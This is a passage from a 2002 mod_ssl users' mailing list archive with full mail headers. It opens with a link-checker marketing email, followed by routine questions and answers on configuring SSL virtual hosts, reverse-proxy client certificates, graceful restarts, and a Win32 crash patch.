cl= ick this link http://scclick.internetseer.com/sitecheck/cancel.jsp?Hw_573txWS5a= UzRPz5tNIVWzC5dIzL.e3=20 or reply to this message with the word "cancel" in the subject line. We sincerely hope that you=92ll become one of InternetSeer's 850,000 satisfied subscribers. Sincerely, Cindy Jordan Web Site Analyst InternetSeer.com "Free Website Monitoring" http://www.internetseer.com ##modssl-users@modssl.org## ------=_Part_4251_389143.1011123248723 Content-Type: text/html Content-Transfer-Encoding: quoted-printable InternetSeer
I noticed that your page: http://www.modssl.org/docs/2.8/ssl_faq.html   =09contained a link to: http://www.wassenaar.org/= .

The page at http://www.wassen= aar.org/ cannot currently be accessed because of the following error: = Time Out. 
=09
=09We last examined your page on 08-28-2001. =09If your page has not been updated since 08-28-2001, your link is=20 =09most likely currently broken. No one likes broken links on their websit= e so we thought you=92d like to be the first to know.

WHO ARE WE?
We=92re Internetseer.com, the worlds largest FREE website monitorin= g service. One recent subscriber wrote the following; =93You did an awesome job identifying to me that our sit= e went down and tracking it until it came back up again=94.

HOW CAN OUR SERVICE BE FREE?
Our service is supported by advertisers and subscribers who purchas= e additional services, but our basic service is FREE.

=09Activating a free website monitoring account could not be easier. Click = here for auto sign-up.
=09
WHAT DO YOU GET FOR FREE?
We=92ll monitor your site once every hour, 24 hours a day, seven da= ys a week for free. You can even have multiple people notified when we dete= ct an error. In addition, you=92ll receive a website performance report eve= ry week showing uptime percentages, average connect times, helpful links to= others sites and of course promotions from our advertisers. You can cancel your free subscription at any time.

This message is not spam because we are not trying to sell you a se= rvice. We are simply advising you that a link on your website is currently = broken due to the error listed above.

If you would like to subscribe to our free website monitoring servi= ce, please click here.

If you do not wish to receive any further email messages from us, <= a href=3D"http://scclick.internetseer.com/sitecheck/cancel.jsp?Hw_573txWS5a= UzRPz5tNIVWzC5dIzL.e3">click here to cancel, or reply to this message w= ith the word "cancel" in the subject line.

We sincerely hope that you=92ll become one of InternetSeer=92s 850,= 000 plus
satisfied subscribers.

=09=09Sincerely,

Cindy Jordan 
Web Site Analyst
InternetSeer.com "Free Website Monitoring"
http://www.internetseer.com=

##modssl-users@modssl.org##
------=_Part_4251_389143.1011123248723-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 12:55:55 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA23416; Wed, 16 Jan 2002 12:55:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA23312; Wed, 16 Jan 2002 12:54:19 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA10316 for ; Wed, 16 Jan 2002 12:54:13 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma010248; Wed, 16 Jan 02 12:54:05 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA12319 for ; Wed, 16 Jan 2002 12:54:05 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA13658 for ; Wed, 16 Jan 2002 12:54:05 +0100 (MET) Message-ID: <3C4569DD.9C877DD@bourse.ch> Date: Wed, 16 Jan 2002 12:54:05 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache modssl last release ... References: <003a01c19d54$bbb5c4b0$ff78a8c0@workstationi> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > [ Falk Großwig ] wrote: > > Hello, > > i just installed the mod_ssl for Apache. First it workes fine, but i > cant tell how, the Apache shuts down the mod_ssl ... > > i cant reach the mod_ssl url if i open a new browser window. > > > > ServerAdmin webmaster@design-4-you.org > ServerName design-4-you > DocumentRoot E:/Server/secure/ > ErrorLog E:/Server/logs/secure.design-4-you.ath.cx-error_log > CustomLog E:/Server/logs/secure.design-4-you.ath.cx-access_log common > SSLEngine On > SSLCertificateFile conf/ssl/www.design-4-you.ath.cx.cert > SSLCertificateKeyFile conf/ssl/www.design-4-you.ath.cx.key > So this is your SSL VH? First, you need: Listen 443 before the VH so apache listens to port 443, which is where SSL works. Second, you need to define port 443 in the VH, i.e. Third, you need to start apache with SSL. In unix, the command is: # apachectl startssl or (more primitively) # ./httpd -DSSL check the docs for the appropriate command under windows. Rgds, Owen boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 15:15:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA01882; Wed, 16 Jan 2002 15:14:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id PAA01849; Wed, 16 Jan 2002 15:13:26 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id PAA11962 for ; Wed, 16 Jan 2002 15:12:44 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma011906; Wed, 16 Jan 02 15:12:38 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id PAA17709 for ; Wed, 16 Jan 2002 15:12:38 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA24338 for ; Wed, 16 Jan 2002 15:12:39 +0100 (MET) Message-ID: <3C458A57.BB8D22BF@bourse.ch> Date: Wed, 16 Jan 2002 15:12:39 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Question References: <3C4349E3.84D36D92@eos.east.hitc.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Natisha Greenway wrote: > > Hello, > > I am a new user of modssl and several questions. I am trying to build > modssl and would like to know once I got it installed how can I tell if > it is properly installed or working? Is there some sort of compiler > flag that I can implement? You need to create an SSL virtual host in httpd.conf and restart apache in SSL mode. Look in the mod_ssl docs for the directives you need to use to define an SSL VH rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 15:34:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA02619; Wed, 16 Jan 2002 15:32:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mag06.bb.admin.ch id PAA02581; Wed, 16 Jan 2002 15:31:15 +0100 (MET) From: Michael.Straessle@bk.admin.ch Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72]) by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g0GEVE211986 for ; Wed, 16 Jan 2002 15:31:14 +0100 (MET) Received: from mas21.bb.admin.ch (mas21.bb.admin.ch [193.5.222.82]) by mar02.bb.admin.ch (8.11.2/8.11.2) with SMTP id g0GEV9P07044 for ; Wed, 16 Jan 2002 15:31:09 +0100 (MET) Received: by ad01007exc.ad.admin.ch with Internet Mail Service (5.5.2653.19) id ; Wed, 16 Jan 2002 15:31:09 +0100 Message-ID: To: modssl-users@modssl.org Subject: RE: Apache modssl last release ... Date: Wed, 16 Jan 2002 15:31:04 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA02605 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Michael.Straessle@bk.admin.ch X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > > [ Falk Großwig ] wrote: > > > > Hello, > > > > i just installed the mod_ssl for Apache. First it workes fine, but i > > cant tell how, the Apache shuts down the mod_ssl ... > > > > i cant reach the mod_ssl url if i open a new browser window. > > > > > > > > > ServerAdmin webmaster@design-4-you.org > > ServerName design-4-you > > DocumentRoot E:/Server/secure/ > > ErrorLog E:/Server/logs/secure.design-4-you.ath.cx-error_log > > CustomLog > E:/Server/logs/secure.design-4-you.ath.cx-access_log common > > SSLEngine On > > SSLCertificateFile conf/ssl/www.design-4-you.ath.cx.cert > > SSLCertificateKeyFile conf/ssl/www.design-4-you.ath.cx.key > > > > So this is your SSL VH? > > First, you need: > > Listen 443 > > before the VH so apache listens to port 443, which is where SSL works. > > Second, you need to define port 443 in the VH, i.e. > > > > Third, you need to start apache with SSL. In unix, the command is: > > # apachectl startssl > > or (more primitively) > > # ./httpd -DSSL > > check the docs for the appropriate command under windows. ...which would be apache -D SSL Fourth, your apache needs to be compiled with the -EAPI flag, otherwise mod_ssl will not work. if you use a binary distribution, this is most probably not the case. AFAIK there is no such distribution for 1.3.22 /win32. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 17:44:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA08561; Wed, 16 Jan 2002 17:43:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from e1.ny.us.ibm.com id RAA08544; Wed, 16 Jan 2002 17:43:10 +0100 (MET) Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.117.200.21]) by e1.ny.us.ibm.com (8.9.3/8.9.3) with ESMTP id LAA79096 for ; Wed, 16 Jan 2002 11:39:33 -0500 Received: from d01mlc83.pok.ibm.com (d01mlc83.pok.ibm.com [9.117.250.34]) by northrelay01.pok.ibm.com (8.11.1m3/NCO v5.01) with ESMTP id g0GGgPL44522 for ; Wed, 16 Jan 2002 11:42:26 -0500 Subject: Message counts in Apache To: modssl-users@modssl.org X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: From: "Evan Jennings" Date: Wed, 16 Jan 2002 11:42:07 -0500 X-MIMETrack: Serialize by Router on D01MLC83/01/M/IBM(Release 5.0.9 |November 26, 2001) at 01/16/2002 11:42:27 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Evan Jennings" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We're implementing a network services database where key applications on the system update counters for messages in and messages out that can then be examined by the system operators. What exactly a message is depends on the application, but in Apache I assume this will be HTTP GET/PUT/POST requests. In a quick look at the Apache code, I see the function increment_counts in http_main.c. Would this be the best place to add the message counter? The message counts are kept on a port and protocol basis. How do I distinguish between the different ports that may be configured in httpd.conf, like a Listen 443 for example? Regards, Evan Jennings TPF Development, IBM Corp. Poughkeepsie NY (845) 435-1918 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 16 18:43:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA12703; Wed, 16 Jan 2002 18:42:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from be-juno2.ubinet.ubs.com id SAA12689; Wed, 16 Jan 2002 18:42:09 +0100 (MET) Received: from svpegasus2-outbound.flur.zuerich.ubs.ch ([160.59.228.179]) by be-juno2.ubinet.ubs.com (8.11.2/8.11.2) with ESMTP id g0GHg3J27258 for ; Wed, 16 Jan 2002 18:42:03 +0100 (MET) Received: from svpegasus2.flur.zuerich.ubs.ch (localhost [127.0.0.1]) by svpegasus2-outbound.flur.zuerich.ubs.ch (Postfix) with ESMTP id E6EC950574 for ; Wed, 16 Jan 2002 18:42:03 +0100 (MET) Received: from ubs.com (w01b16zw.flur.zuerich.ubs.ch [160.59.189.2]) by svpegasus2.flur.zuerich.ubs.ch (Postfix) with ESMTP id A75CE48CA for ; Wed, 16 Jan 2002 18:42:03 +0100 (MET) Message-ID: <3C45BB6A.15E0715A@ubs.com> Date: Wed, 16 Jan 2002 18:42:02 +0100 From: Ian Beselin X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: can reverse proxy send server cert onwards Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ian Beselin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am using a reverse proxy built with apache 1.3.19 with mod_rewrite and mod_proxy, and mod_ssl 2.8.2. The connection looks like: Client Proxy Application ------ ----- ----------- <----- SSL connect 1 ----> <----- SSL connect 2 ---------> SSL connection 1 uses client and server certs ("SSLVerifyClient require"). I also need to use client and server certs on SSL connection 2 (i.e. the connection initiated by mod_proxy). But when the application Apache server requires a client cert ("SSLVerifyClient require") it does not receive a cert from the proxy. Is there a way to configure mod_ssl / mod_proxy to send a cert on SSL con 2? The cert does not need to be related to the cert on SSL connection 1, and I also don't need to forward any fields from the client cert as HTTP headers. Here are some relevant config statements from the proxy SSLCertificateKeyFile ${crtdir}/${hostname}.key SSLCertificateFile ${crtdir}/${hostname}.crt SSLCertificateChainFile ${crtdir}/ubs-ca.crt SSLCACertificateFile ${crtdir}/conextradeCA-qa1.crt SSLVerifyClient require RewriteEngine On RewriteRule ^/(xcc)$ https://${appl}/$1 [P,L] RewriteRule .* - [F] Thanks Ian -------------------------------------------------------------- Ian Beselin (BH-I5EW-MF9) ian.beselin@ubs.com +41 1 236 1629 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 16:20:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16279; Thu, 17 Jan 2002 16:19:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from VL-MS-MR002.sc1.videotron.ca id QAA16250; Thu, 17 Jan 2002 16:18:53 +0100 (MET) Received: from shodan2 ([24.200.91.45]) by VL-MS-MR002.sc1.videotron.ca (Netscape Messaging Server 4.15) with ESMTP id GQ397E01.3RJ for ; Thu, 17 Jan 2002 10:18:50 -0500 From: "Enrico Demarin" To: Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) Date: Thu, 17 Jan 2002 10:18:47 -0800 Message-ID: <000201c19f83$68105ec0$0340a8c0@shodan2> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0003_01C19F40.59F02C00" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Enrico Demarin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0003_01C19F40.59F02C00 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit I know it's not supported but... seems like something is still not good in mod_ssl , as reported by Josef Goebel, who posted a patch, there is something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , that cures the crash in most of the cases in ap_ctx_get() adds: if ((ctx==NULL) || (key==NULL)) { ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", __FILE__, __LINE__); return NULL; } and i also added the same check in ap_ctx_set. The problem is that sometimes mod_ssl calls such functions with ctx set to null and key set to null, and crashes apache. I have had other crashes which i haven't been able to debug ( how do i properly build a debug version of apache-ssl on win32 ? when the visual c debug window pops up after a crash all i can see is assembly code ). As reported by Josef the "null" calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, but why does it happen ? is there some memory corruption going inside mod_ssl that causes the structures to be set to null ? Apache with aforementioned patch is "almost" stable but... i have the sensation that there is a problem somewhere else. - Enrico ------=_NextPart_000_0003_01C19F40.59F02C00 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Message
I know = it's not=20 supported but... seems like something is still not good in mod_ssl , as = reported=20 by Josef Goebel,
who = posted a patch,=20 there is something odd in mod_ssl for win32. I applied his patch to = ap_ctx.c ,=20 that cures
the = crash in most of=20 the cases
 
in = ap_ctx_get()=20 adds:
 
 if=20 ((ctx=3D=3DNULL) || (key=3D=3DNULL))
 {
 =20 ap_log_assert("ap_ctx_get_bug: ctx or key are=20 NULL!",
          &n= bsp;           &nb= sp;  =20 __FILE__, = __LINE__);
         =20 return NULL;
        =20 }
 
and i = also added the=20 same check in ap_ctx_set. The problem is that sometimes mod_ssl = calls such=20 functions with ctx set to null and key set to null, and crashes apache. = I have=20 had other crashes which i haven't been able to debug ( how do i properly = build a=20 debug version of apache-ssl on win32 ? when the visual c debug window = pops up=20 after a crash all i can see is assembly code ).  As reported by = Josef the=20 "null" calls seem to be generated by ssl_io_suck_read() in=20 ssl_engine_io.c,
but = why does it=20 happen ? is there some memory corruption going inside mod_ssl that = causes the=20 structures to be set to null ? Apache with aforementioned patch is = "almost"=20 stable but... i have the sensation that there is a  problem = somewhere else.=20
 
 
-=20 Enrico
------=_NextPart_000_0003_01C19F40.59F02C00-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 16:32:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16822; Thu, 17 Jan 2002 16:31:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from digexch1.digarch.com id QAA16760; Thu, 17 Jan 2002 16:30:32 +0100 (MET) Received: from chorazin.delanotech.com (CHORAZIN [10.5.1.149]) by digexch1.digarch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id CWKBJG40; Thu, 17 Jan 2002 09:30:17 -0600 Message-Id: <5.1.0.14.0.20020117092540.00a48390@digexch1> X-Sender: jburgess@digexch1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Thu, 17 Jan 2002 09:30:14 -0600 To: modssl-users@modssl.org From: Jay Burgess Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jay Burgess X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I could have written your email word for word! I've been trying to keep Apache/mod_ssl running on WIN32 since early December, and still haven't figured out what's wrong. Josef's patch seemed to work for him, but even after applying it, my SSL-enabled Apache only runs a few minutes under heavy load before crashing. As far as getting a debug version built, I've had lots of trouble with that as well. It seems to build just fine in debug mode in Visual C++, but when I attempt to debug the EXE after a crash, I get no source code to trace. Is there anyone out there successfully running an SSL-enabled version of Apache on WIN32? If so, did you have to do anything special? And either way, does someone have a write-up explaining how to put together a debug build? Thanks. Jay -----Original Message----- From: Enrico Demarin [mailto:enricod@videotron.ca] Sent: Thursday, January 17, 2002 12:19 PM To: modssl-users@modssl.org Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) I know it's not supported but... seems like something is still not good in mod_ssl , as reported by Josef Goebel, who posted a patch, there is something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , that cures the crash in most of the cases in ap_ctx_get() adds: if ((ctx==NULL) || (key==NULL)) { ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", __FILE__, __LINE__); return NULL; } and i also added the same check in ap_ctx_set. The problem is that sometimes mod_ssl calls such functions with ctx set to null and key set to null, and crashes apache. I have had other crashes which i haven't been able to debug ( how do i properly build a debug version of apache-ssl on win32 ? when the visual c debug window pops up after a crash all i can see is assembly code ). As reported by Josef the "null" calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, but why does it happen ? is there some memory corruption going inside mod_ssl that causes the structures to be set to null ? Apache with aforementioned patch is "almost" stable but... i have the sensation that there is a problem somewhere else. - Enrico ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 17:13:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA19075; Thu, 17 Jan 2002 17:12:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from violator.zp.ua id RAA19052; Thu, 17 Jan 2002 17:11:45 +0100 (MET) Received: from there (localhost.zp.ua [127.0.0.1]) by violator.zp.ua (8.11.6/8.11.6) with SMTP id g0HGBgG70492 for ; Thu, 17 Jan 2002 18:11:42 +0200 (EET) (envelope-from roman@it-ukraine.com) Message-Id: <200201171611.g0HGBgG70492@violator.zp.ua> Content-Type: text/plain; charset="koi8-r" From: Roman V Moroz Organization: IT-Ukraine To: modssl-users@modssl.org Subject: apache+mod_ssl & kill -USR1 Date: Thu, 17 Jan 2002 18:11:41 +0200 X-Mailer: KMail [version 1.3] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Roman V Moroz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! Is there possiblity to restart Apache with mod_ssl graceful (with kill -USR1 httpd)? F.A.Q. @ official site didn't help me :( -------------------------------------------------------------- Roman V Moroz IT-Ukraine ltd Chief of Network Department NIC-HDL: VIO13-RIPE Zaporozhye, Ukraine http://www.moroz.zp.ua http://www.it-ukraine.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 17:22:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA19424; Thu, 17 Jan 2002 17:21:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id RAA19414; Thu, 17 Jan 2002 17:21:00 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id 6D682CCA71 for ; Thu, 17 Jan 2002 11:25:25 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id 5DD2B19B2; Thu, 17 Jan 2002 11:20:53 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <200201171611.g0HGBgG70492@violator.zp.ua> X-Base: are belong to us. move zig for great justice. Date: Thu, 17 Jan 2002 11:20:53 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: RE: apache+mod_ssl & kill -USR1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 17-Jan-2002 Roman V Moroz wrote: > Is there possiblity to restart Apache with mod_ssl graceful (with kill -USR1 > httpd)? Yes, it's possible, but if you are adding or deleting new SSL virtual hosts, you cannot use SIGUSR1; it needs a full restart. Unless you're asking a totally different question or experiencing a specific problem, in which case we need more details... - Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 19:02:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA24339; Thu, 17 Jan 2002 19:01:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from unimur.um.es id TAA24307; Thu, 17 Jan 2002 19:00:19 +0100 (MET) Received: from aries.dif.um.es (aries.dif.um.es [155.54.210.253]) by unimur.um.es (8.9.1b+Sun/8.9.1) with ESMTP id TAA25825 for ; Thu, 17 Jan 2002 19:02:30 +0100 (MET) Received: from dif.um.es (pirania.dif.um.es [155.54.210.33]) by aries.dif.um.es (Postfix) with ESMTP id F26B314431 for ; Thu, 17 Jan 2002 18:59:45 +0100 (MET) Message-ID: <3C471048.44ECC7B8@dif.um.es> Date: Thu, 17 Jan 2002 18:56:24 +0100 From: Gabriel Lopez =?iso-8859-1?Q?Mill=E1n?= X-Mailer: Mozilla 4.76 [es] (X11; U; Linux 2.4.2-2 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: mod_ssl-X.X.X-2.0.YY-tar.gz? Content-Type: multipart/alternative; boundary="------------103FE6B798CA0DD3D3F8DF4F" Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Gabriel Lopez =?iso-8859-1?Q?Mill=E1n?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------103FE6B798CA0DD3D3F8DF4F Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit When? Thanks, Gabi. -- ------------------------------------------------- Gabriel Lopez Millan - Grupo ANTS-CIRCuS Facultad de Informática Universidad de Murcia (España) Tfo: +34 968367645 --------------103FE6B798CA0DD3D3F8DF4F Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit  
    When?

    Thanks, Gabi.
  

-- 
-------------------------------------------------
Gabriel Lopez Millan - Grupo ANTS-CIRCuS
Facultad de Informática
Universidad de Murcia (España) Tfo: +34 968367645
  --------------103FE6B798CA0DD3D3F8DF4F-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 19:04:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA24385; Thu, 17 Jan 2002 19:03:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spork.sendmail.com id TAA24380; Thu, 17 Jan 2002 19:03:01 +0100 (MET) Received: from foon.sendmail.com (smtp.sendmail.com [209.246.26.40]) by spork.sendmail.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g0HI39i13466 (using TLSv1/SSLv3 with cipher EDH-RSA-DES-CBC3-SHA (168 bits) verified OK) for ; Thu, 17 Jan 2002 10:03:09 -0800 (PST) Received: from lab.Sendmail.COM (natted.Sendmail.COM [63.211.143.38]) by foon.sendmail.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g0HI2l230819 for ; Thu, 17 Jan 2002 10:02:48 -0800 Date: Thu, 17 Jan 2002 10:02:58 -0800 (PST) From: Son X-X-Sender: son@lab.smi.sendmail.com To: modssl-users@modssl.org Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) In-Reply-To: <5.1.0.14.0.20020117092540.00a48390@digexch1> Message-ID: <20020117095711.O53374-100000@lab.smi.sendmail.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Filtered: Sendmail MIME Filter v1.0.7 foon.sendmail.com g0HI2l230819 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Son X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users i've actually made some hacks to get it to work; i was able to build a debug version and found that there were problems in the ssl log code. as a temporary fix, i was able to disable that portion of the code, so it crashes much much less (i rarely see it anymore). however, as a drawback, i no longer have access to an ssl log. -son On Thu, 17 Jan 2002, Jay Burgess wrote: > I could have written your email word for word! I've been trying to keep > Apache/mod_ssl running on WIN32 since early December, and still haven't > figured out what's wrong. Josef's patch seemed to work for him, but even > after applying it, my SSL-enabled Apache only runs a few minutes under > heavy load before crashing. > > As far as getting a debug version built, I've had lots of trouble with that > as well. It seems to build just fine in debug mode in Visual C++, but when > I attempt to debug the EXE after a crash, I get no source code to trace. > > Is there anyone out there successfully running an SSL-enabled version of > Apache on WIN32? If so, did you have to do anything special? And either > way, does someone have a 